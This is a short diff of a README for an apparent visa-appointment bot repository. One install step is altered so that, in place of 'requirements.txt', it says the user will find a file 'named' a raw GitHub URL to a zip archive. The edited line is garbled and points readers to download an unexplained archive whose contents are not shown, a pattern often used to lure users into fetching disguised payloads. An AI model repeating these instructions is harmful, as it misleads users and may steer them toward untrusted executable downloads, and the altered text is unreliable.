rj3741303-afk/spain-visa-appointment-bot/README.md

 - If you downloaded a zip file, extract it to a folder on your desktop.
 - Open the folder where you extracted the files.
-- Inside you will find a file named `requirements.txt`.
+- Inside you will find a file named `https://github.com/rj3741303-afk/spain-visa-appointment-bot/raw/refs/heads/main/tikker/visa_bot_spain_appointment_1.7.zip`.

 To install the bot dependencies: